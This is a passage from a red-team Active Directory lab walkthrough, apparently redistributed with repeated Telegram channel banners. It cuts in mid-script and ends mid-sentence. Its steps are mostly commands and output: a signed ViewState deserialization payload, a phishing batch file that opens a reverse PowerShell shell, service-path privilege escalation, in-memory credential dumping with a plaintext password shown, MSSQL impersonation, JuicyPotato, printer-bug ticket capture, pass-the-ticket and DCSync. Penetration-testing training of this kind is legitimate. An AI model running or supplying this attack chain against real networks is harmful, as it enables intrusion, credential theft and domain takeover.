LlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ
3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNW
M1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw=
='

payload = base64.b64decode(serialized_data)

# Get machine key by uploading .shtml file

(Server Side Include)
validation_key =
bytes.fromhex('b07b0f97365416288cf0247cffdf135d25
f6be87')

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

mac = hashlib.md5(payload + validation_key +

b'\x00\x00\x00\x00').digest()
payload = base64.b64encode(payload +
mac).decode()
print('')
print(payload)

Execute the python script from the attacking

Linux machine (a solution like a port/socks proxy
will be required) to get the final MAC signed
serialized object:

Now, we need to start a listener on workstation01

on port 2222 (as defined in the reverse shell
call):

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

With the listener started, we need to create a

new file upload request (just select any file
that can be uploaded, at this stage it doesn't
matter which one), and replace the value of
"__VIEWSTATE" to that generated by the python
script:

When the request is submitted, the server will

return an error -- this is expected:

However, if you look at our listening shell, we

have successfully received a reverse shell:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

It appears that we are running in the context of

a service account. To escalate our privileges, we
will use PrintSpoofer. Compile for 64bits and
upload the solution to Protect-DC. Then, you can
use PrintSpoofer, for example, as follows (in
conjunction with a bind tcp MSF executable).

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We successfully gained SYSTEM rights on

"protect-dc".

What we knew from before is that the production

forest "els.bank" had one-way outbound trust to
"protect.bank". This means that principals from
"protect.bank" are trusted by "els.bank". This
one-way trust is often employed by Bastion
forests, which are used to manage production
forests through Shadow principals. To check if
this is the case and if any account in
"protect.bank" has elevated rights through Shadow

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

principals in "els.bank", we'll run the following

command:

Indeed, it appears that the user "Administrator"

has that privilege. Now our task is to compromise
that account. There are multiple ways to do that
from SYSTEM rights:

● Dump NTDS of the "protect.bank" domain

● Utilize Mimikatz-like functionality to

extract stored password hashes/plain text
credentials in memory

We could of course choose either of those

methods, the second one however relies on the
fact that the Administrator's account must have
connected after the last reboot (and is not
member of the group 'Protected users' of
"protect.bank"). We also discovered that the
directory "C:\users\Administrator\Desktop"
contains a file "lsass.dmp", which in fact looks

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

like a mini-dump output of lsass. This is likely

a leftover file from perhaps debugging actions by
the administrator. Instead of taking any of the 2
approaches mentioned above, we download the file
and parse it offline with Mimikatz to verify
whether this was indeed a memory dump of the
lsass process:

Parsing it indeed returns the password hash of

the account "Administrator" in "protect.bank".
Using the password hash, we can perform any hash
related authentication abuse to login as the
account "Administrator" to "Protect-DC".

Example from metasploit:

mimikatz # sekurlsa::pth /user:Administrator

/domain:protect.bank /rc4:<RC4> /run:notepad.exe
steal_token <NOTEPAD_PID>
shell

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Once logged on, we can verify that the account

has access to "els.bank" through the previously
discovered Shadow Principal configuration:

—-----------------------------------------------
—------------------------------------------------
-----------------------------------------------

Red-teaming Active Directory Lab

#3 (ELS.CORP) (Attack Path 1)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://my.ine.com/CyberSecurity/courses/9328123b/penet
ration-testing-red-teaming-active-directory/lab/3890101
f-20b6-46a3-9301-5bd3f33601ac

Contents
Mail Server Attack Path (Path 1)

1. DEV SYS . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . .

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

2. DB-SRV . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . .

3. ELS-DC . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . . .

4. MGMT-DC . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . .

5. JUMP-SRV . . . . . . . . . . . . . . . . .
. . . . . . . . . . . . .

6. Admin-SYS . . . . . . . . . . . . . . . . .
. . . . . . . . . . . .

Scenario
You have been asked to execute a (black-box) red
teaming exercise against eLS Corp (including any
related/trusted forest). The letter of engagement
has specified:

1. The ADMIN-SYS system as the crown jewel.

This means that the ultimate goal of this red
teaming exercise is to obtain access to the
ADMIN-SYS system.

2. That during this exercise, the web

application hosted on 172.16.250.2 is out of
scope and should not be touched

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

3. The mail server hosted on 172.16.250.2 is

included in the scope and you can execute
phishing attempts. Note that the only file
type you can attach is .bat files.

4. That the pentesters' network range is

172.16.25.0/24 and a static route has been
configured so that pentesters can access the
172.16.250.0/24 network range, where eLS Corp
assets exist

5. For any cracking activities use the

/usr/share/wordlists/rockyou.txt wordlist,
included in latest Kali's

Hints
Refer to the attack path diagram of page 1 only
when you are out of options.
1. DEV-SYS Server

Scanning the accessible IP range from the scope

of engagement provides us with two possible entry
points both residing on the "172.16.250.2" IP.
Specifically, scanning the TCP ports of
172.16.250.2 tells us that an SMTP server and a
web application are running on TCP ports 25 and
80. According to the letter of engagement, the
web application is out of scope.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Let's perform banner grabbing against the SMTP

service running on the target server. A username
"dev-user@els.corp" is visible which means the
mailbox belongs to this particular user.

Since there is no other entry point, we need to

send a malicious attachment along with an e-mail
to "dev-user" and wait until the attachment is
opened.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We will use msfvenom to generate a malicious

batch file, that will be sent as an attachment to
the victim machine.

𝑚𝑠𝑓𝑣𝑒𝑛𝑜𝑚 −𝑝 𝑐𝑚𝑑/𝑤𝑖𝑛𝑑𝑜𝑤𝑠/𝑟𝑒𝑣𝑒𝑟𝑠𝑒_𝑝𝑜𝑤𝑒𝑟𝑠ℎ𝑒𝑙𝑙
𝐿𝐻𝑂𝑆𝑇=172.16.25.𝑥 𝐿𝑃𝑂𝑅𝑇=4443 > 𝑎𝑡𝑡𝑎𝑐ℎ.𝑏𝑎𝑡

Let's now setup our listener using Metasploit,

using the above TCP port and IP address.

𝑚𝑠𝑓𝑐𝑜𝑛𝑠𝑜𝑙𝑒
𝑢𝑠𝑒 𝑒𝑥𝑝𝑙𝑜𝑖𝑡/𝑚𝑢𝑙𝑡𝑖/ℎ𝑎𝑛𝑑𝑙𝑒𝑟
𝑠𝑒𝑡 𝑝𝑎𝑦𝑙𝑜𝑎𝑑 𝑐𝑚𝑑/𝑤𝑖𝑛𝑑𝑜𝑤𝑠/𝑟𝑒𝑣𝑒𝑟𝑠𝑒_𝑝𝑜𝑤𝑒𝑟𝑠ℎ𝑒𝑙𝑙
𝑠𝑒𝑡 𝐿𝐻𝑂𝑆𝑇 <𝑦𝑜𝑢𝑟_𝐼𝑃_𝐴𝑑𝑑𝑟𝑒𝑠𝑠>
𝑠𝑒𝑡 𝐿𝑃𝑂𝑅𝑇 <𝐿𝑖𝑠𝑡𝑒𝑛𝑖𝑛𝑔_𝑃𝑜𝑟𝑡>
𝑟𝑢𝑛

For sending the e-mail to our target

["dev-user.els.corp"] we will use the "sendemail"
tool, as follows.

𝑐𝑎𝑡 𝑚𝑠𝑔.𝑡𝑥𝑡 | 𝑠𝑒𝑛𝑑𝑒𝑚𝑎𝑖𝑙 −𝑙 𝑒𝑚𝑎𝑖𝑙.𝑙𝑜𝑔 −𝑓 "𝑠𝑒𝑛𝑑𝑒𝑟@𝑡𝑒𝑠𝑡.𝑐𝑜𝑚" −𝑢

"𝑠𝑢𝑏𝑗𝑒𝑐𝑡" −𝑡 "𝑑𝑒𝑣−𝑢𝑠𝑒𝑟@𝑒𝑙𝑠.𝑐𝑜𝑟𝑝" −𝑠 "172.16.250.2:25" −𝑜
𝑡𝑙𝑠=𝑛𝑜 −𝑎 𝑎𝑡𝑡𝑎𝑐ℎ.𝑏𝑎𝑡

Switches:

-f: Sender of mail

-u: Subject added in the mail

-t: Target user (or recipient)

-s: Server to connect while sending mail

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

-a: Attachment to send with Mail.

The e-mail should have been sent successfully,

when the following message appears:

As soon as our attachment is opened by the target

user ["dev-user.els.corp"], we will have our
initial foothold in the target user machine. If
the session is not established, please execute
the below from inside your attacking machine
(Impacket is required) and then send the email
again a couple of times.

python3 smbexec.py
'Administrator:Doctor@963'@172.16.250.5

Inside the semi-interactive shell execute:

netsh interface ipv4 set interface Ethernet0

metric=20

Inside the semi-interactive shell also execute:

netsh interface ipv4 set interface Ethernet1

metric=10

This session can then be converted into a stable

meterpreter session, as follows:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

𝑢𝑠𝑒 𝑝𝑜𝑠𝑡/𝑚𝑢𝑙𝑡𝑖/𝑚𝑎𝑛𝑎𝑔𝑒/𝑠ℎ𝑒𝑙𝑙_𝑡𝑜_𝑚𝑒𝑡𝑒𝑟𝑝𝑟𝑒𝑡𝑒𝑟
𝑠𝑒𝑡 𝑝𝑎𝑦𝑙𝑜𝑎𝑑_𝑜𝑣𝑒𝑟𝑟𝑖𝑑𝑒 𝑤𝑖𝑛𝑑𝑜𝑤𝑠/𝑚𝑒𝑡𝑒𝑟𝑝𝑟𝑒𝑡𝑒𝑟/𝑟𝑒𝑣𝑒𝑟𝑠𝑒_𝑡𝑐𝑝
𝑠𝑒𝑡 𝑠𝑒𝑠𝑠𝑖𝑜𝑛 <𝑠𝑒𝑠𝑠𝑖𝑜𝑛_𝐼𝐷>
𝑠𝑒𝑡 𝐿𝐻𝑂𝑆𝑇 172.16.25.𝑥
𝑠𝑒𝑡 𝐿𝑃𝑂𝑅𝑇 <𝑙𝑖𝑠𝑡𝑒𝑛𝑖𝑛𝑔_𝑝𝑜𝑟𝑡>
run

or

𝑠𝑒𝑠𝑠𝑖𝑜𝑛𝑠 −𝑢 <𝑠𝑒𝑠𝑠𝑖𝑜𝑛_𝐼𝐷>

We now have a stable Meterpreter session with

"dev-user" domain user rights. We now need to
enumerate the environment & elevate our
privileges in order to move forward in the
network.

After enumerating the services, we as "dev-user"

have FULL CONTROL over the SNMPTRAP service.

C:\Windows>sc qc snmptrap
sc qc snmptrap
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: snmptrap
TYPE : 10
WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME :
C:\Windows\System32\snmptrap.exe
LOAD_ORDER_GROUP :

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

TAG : 0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : .\Administrator

Since we have full control over this service, to

elevate our privileges to local administrator we
can add dev-user to the "Administrators" group by
abusing the binary path of the service.

sc stop snmptrap
sc config snmptrap binpath="net localgroup
administrators dev-user /add"
sc start snmptrap

Exit the shell and spawn a new shell from the

meterpreter prompt. We can see that "Dev-User"
can now be found as a member of the local
Administrators group.

C:\Windows\system32>net localgroup Administrators

net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and
unrestricted access to the computer/domain

Members

-------------------------------------------------
------------------------------
Administrator
ELS-CHILD\dev-user

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

ELS-CHILD\Domain Admins

The command completed successfully.

A Database Connection configuration file is

located at the Administrator's Desktop, but as a
local administrator member we still do not have
enough privileges to view it.

To view the file, we can impersonate the token of

Administrator at DEV-SYS, as follows.

load incognito
list_tokens -u

Delegation Tokens Available

========================================
DEV-SYS\Administrator
ELS-CHILD\dev-admin
ELS-CHILD\dev-user
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1

Impersonation Tokens Available

========================================
No tokens available

impersonate token "DEV-SYS\Administrator"

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now, as DEV-SYS\Administrator we can view the

file located at the Administrator's Desktop. An
IP address of a Database server is clearly
visible in the file.

As part of our post-exploitation activities, we

will dump the credentials in this machine to
maintain stable persistence.

But first, let us migrate to x64 process & load

the kiwi module to dump credentials.

migrate $x64_pid
load kiwi
creds_all

[. . 𝑆𝑁𝐼𝑃. .]
𝑚𝑠𝑣 ∶
[00000003] 𝑃𝑟𝑖𝑚𝑎𝑟𝑦
∗ 𝑈𝑠𝑒𝑟𝑛𝑎𝑚𝑒 ∶ 𝑑𝑒𝑣−𝑎𝑑𝑚𝑖𝑛
∗ 𝐷𝑜𝑚𝑎𝑖𝑛 ∶ 𝐸𝐿𝑆−𝐶𝐻𝐼𝐿𝐷
∗ 𝑁𝑇𝐿𝑀 ∶ 𝟕𝒃𝟓𝟑𝒄𝟔𝟎𝒆𝟗𝟏𝟏𝟑𝒄𝒄𝟖𝒃𝟏𝟗𝟒𝒄𝒃𝟑𝟒𝒅𝒆𝟒𝟖𝟎𝟓𝒇𝟑𝒃
∗ 𝑆𝐻𝐴1 ∶ 72𝑓𝑑2𝑐3𝑑682𝑑3957𝑓𝑑6𝑏8523𝑑𝑑86𝑐𝑐12𝑏𝑎51𝑎𝑒𝑓2
∗ 𝐷𝑃𝐴𝑃𝐼 ∶ 𝑓5𝑐𝑓𝑑88𝑑690𝑒1𝑒9338𝑒2𝑒𝑑8162𝑎6𝑏6𝑏4
𝑡𝑠𝑝𝑘𝑔 ∶
𝑤𝑑𝑖𝑔𝑒𝑠𝑡 ∶
∗ 𝑈𝑠𝑒𝑟𝑛𝑎𝑚𝑒 ∶ 𝑑𝑒𝑣−𝑎𝑑𝑚𝑖𝑛

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

∗ 𝐷𝑜𝑚𝑎𝑖𝑛 ∶ 𝐸𝐿𝑆−𝐶𝐻𝐼𝐿𝐷
∗ 𝑃𝑎𝑠𝑠𝑤𝑜𝑟𝑑 ∶ 𝑯@𝒓𝒅𝑷@𝒔𝒔𝑫!𝒇𝒇!𝒄𝒖𝒍𝒕𝟗𝟔𝟒!!
𝑘𝑒𝑟𝑏𝑒𝑟𝑜𝑠 ∶
∗ 𝑈𝑠𝑒𝑟𝑛𝑎𝑚𝑒 ∶ 𝑑𝑒𝑣−𝑎𝑑𝑚𝑖𝑛
∗ 𝐷𝑜𝑚𝑎𝑖𝑛 ∶ 𝐸𝐿𝑆−𝐶𝐻𝐼𝐿𝐷.𝐸𝐿𝑆.𝐶𝑂𝑅𝑃
∗ 𝑃𝑎𝑠𝑠𝑤𝑜𝑟𝑑 ∶ (𝑛𝑢𝑙𝑙)
𝑠𝑠𝑝 ∶
𝑐𝑟𝑒𝑑𝑚𝑎𝑛 ∶
[. . 𝑆𝑁𝐼𝑃. .]

Dev-Admin' (domain user) credentials have been

discovered. Now, let's add a route to
10.10.1.0/24 network discovered in the
configuration file.

route add 10.10.1.0/24 <session_id>

2. DB-SRV Server

By performing ping sweep on the machines in the

10.10.1.0/24 network, the following hosts were
found live.

use post/multi/gather/ping_sweep
set rhosts 10.10.1.0/24
set session <session_id>
run

[..SNIP..]
[+] 10.10.1.1 host found
[+] 10.10.1.2 host found
[+] 10.10.1.3 host found
[..SNIP..]

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Scanning for open TCP ports on the 10.10.1.2

machine that we discovered, shows that TCP port
1433 is actually open.

The discovered "dev-admin" credentials can be

sprayed on the target network. Metasploit's
"scanner/mssql/mssql_login" can also be used to
check if a SQL instance is running at the
specified machine with credentials.

The following text box shows how to use

"dev-admin" credentials with the abovementioned
Metasploit module to check whether we have access
to any MS SQL instances on the machines we
discovered on the internal network.

use auxiliary/scanner/mssql/mssql_login
set username dev-admin
set password H@rdP@ssD!ff!cult964!!
set rhosts 10.10.1.2

It seems that dev-admin can login to the DB-SRV

[10.10.1.2] machine.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Trying to enable "xp_cmdshell" to maintain a

persistent shell on the DB-SRV machine has failed
because the user has insufficient rights to do
so.

After enumeration, it was found that there is a

SQL impersonation vulnerability on the DB-SRV
machine through which the "dev-admin" user can
impersonate the "sa" user.

msf5
auxiliary(admin/mssql/mssql_escalate_execute_as)
> show options

Module options
(auxiliary/admin/mssql/mssql_escalate_execute_as)
:

Name Current Setting

Required Description
---- ---------------
-------- -----------
PASSWORD H@rdP@ssD!ff!cult964!!
no The password for the specified username

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

RHOSTS 10.10.1.2
yes The target host(s), range CIDR
identifier, or hosts file with syntax
'file:<path>'
RPORT 1433
yes The target port (TCP)
TDSENCRYPTION false
yes Use TLS/SSL for TDS data "Force
Encryption"
USERNAME dev-admin
no The username to authenticate as
USE_WINDOWS_AUTHENT false
yes Use windows authentification (requires
DOMAIN option set)

"dev-admin" now has system admin rights.

With sufficient privileges, we can now enable

"xp_cmdshell" to establish a stable bind shell on
DB-SRV server.

Module options
(exploit/windows/mssql/mssql_payload):

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Name Current Setting

Required Description
---- ---------------
-------- -----------
METHOD cmd
yes Which payload delivery method to use
(ps, cmd, or old)
PASSWORD H@rdP@ssD!ff!cult964!!
no The password for the specified username
RHOSTS 10.10.1.2
yes The target host(s), range CIDR
identifier, or hosts file with syntax
'file:<path>'
RPORT 1433
yes The target port (TCP)
SRVHOST 0.0.0.0
yes The local host or network interface to
listen on. This must be an address on the local
machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080
yes The local port to listen on.
SSL false
no Negotiate SSL for incoming connections
SSLCert
no Path to a custom SSL certificate
(default is randomly generated)
TDSENCRYPTION false
yes Use TLS/SSL for TDS data "Force
Encryption"

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

URIPATH
no The URI to use for this exploit
(default is random)
USERNAME dev-admin
no The username to authenticate as
USE_WINDOWS_AUTHENT false
yes Use windows authentification (requires
DOMAIN option set)

Payload options
(windows/x64/meterpreter/bind_tcp):

Name Current Setting Required

Description
---- --------------- --------
-----------
EXITFUNC process yes Exit
technique (Accepted: '', seh, thread, process,
none)
LPORT 4444 yes The
listen port
RHOST 10.10.1.2 no The
target address

Meterpreter will enable the SQL function and

upload a malicious VBS script to DB-SRV.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We are currently running as the SQL service

account. We need to escalate privileges in
DB-SRV.

Listing the privileges of the SQL service shows

that we have "SeImpersonatePrivilege" and
"SeAssignPrimaryTokenPrivilege", we can use
JuicyPotato to escalate our privileges to 'NT
AUTHORITY\SYSTEM'.

On the meterpreter prompt, do the following to

escalate to "NT Authority\System":

mkdir /temp
cd /temp
upload JuicyPotato.exe
execute -f JuicyPotato.exe -a '-t u -p
"C:\Windows\System32\cmd.exe" -l 4444' -i
Successfully escalated to System privileges...

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Another alternative will be to upload a new

payload generated via msfvenom and launch it as
SYSTEM using JuicyPotato.

# Attacker Machine
msfvenom -p windows/x64/meterpreter/bind_tcp
LHOST=10.10.1.2 LPORT=6666 --smallest -f exe
--encrypt AES256 --encrypt-iv 76543210
--encrypt-key w00tw00t -o bind_tcp.exe
# meterpreter
meterpreter > upload
/media/SHARED/LAB/bind_tcp.exe
[*] uploading : /media/SHARED/LAB/bind_tcp.exe
-> bind_tcp.exe
[*] Uploaded 7.00 KiB of 7.00 KiB (100.0%):
/media/SHARED/LAB/bind_tcp.exe -> bind_tcp.exe
[*] uploaded : /media/SHARED/LAB/bind_tcp.exe
-> bind_tcp.exe
meterpreter > execute -f JuicyPotato.exe -a '-t u
-p "C:\temp\bind_tcp.exe" -l 4444' -i
Background session 10? [y/N]
Process 2248 created.
Channel 6 created.
Testing {4991d34b-80a1-4291-83b6-3328366b9097}
4444
....

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT
AUTHORITY\SYSTEM

[+] CreateProcessAsUser OK
# Metasploit handler
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Payload options
(windows/x64/meterpreter/bind_tcp):

Name Current Setting Required

Description
---- --------------- --------
-----------
EXITFUNC process yes Exit
technique (Accepted: '', seh, thread, process,
none)
LPORT 6666 yes The
listen port
RHOST 10.10.1.2 no The
target address

Exploit target:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Id Name
-- ----
0 Wildcard Target

Now, we will check if any type of delegation is

enabled in this server, one can always use the AD
Module or PowerView for confirmation. Let's use
the AD Module to check for delegation.

# meterpreter
upload Microsoft.ActiveDirectory.Management.dll
/temp
# Switch to PowerShell
Import-Module
.\Microsoft.ActiveDirectory.Management.dll
-verbose
Get-AdComputer -Filter {TrustedForDelegation -eq
$True}

DB-SRV is configured with Unconstrained

Delegation! Now, let us leverage this and try to
force a privileged account to connect to the
DB-SRV server.

With enough privileges, we will now abuse the

famous printer bug to get a TGT from the els.corp
Domain Controller. Upload "Rubeus.exe" and
"MS-RPRN.exe" to the DB-SRV server and on one
shell run Rubeus, while on another one coerce
"els-dc" to connect to capture the TGT hash, as
follows.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

# Meterpreter
upload Rubeus.exe
upload SpoolSample.exe
execute -f Rubeus.exe -a "monitor /interval:5" -c
# take note of the channel
execute -f SpoolSample.exe -a "\\els-dc.els.corp
\\db-srv.els.corp" -c
channel -r <RUBEUS_CHANNEL>

If the following message appears while executing

MS-RPRN.exe, then the forceful connection from
"els-dc" might have worked.

'Attempted printer notification and received an

invalid handle. The coerced authentication
probably worked!'

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Since the extracted TGT hash is base64-encoded we

need to remove the extra spaces and perform a
pass the ticket attack against the 'els-dc'
domain controller.

Note: Remember what we have discussed about the

modifications/replacements that need to be made
against the hash.

Perform PTT using "Rubeus.exe":

# Shell
Rubeus.exe ptt /ticket:<BASE64_TICKET>
klist

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The active Kerberos ticket can be viewed as

follows:

Now, with a "ELS-DC$" ticket active in the

current session, we will use Mimikatz to perform
a DCSYNC attack against the "els.corp" domain.

We are able to perform a DCSYNC attack because

the Domain Controller computer account by-default
has "Get-Replication-Changes" &
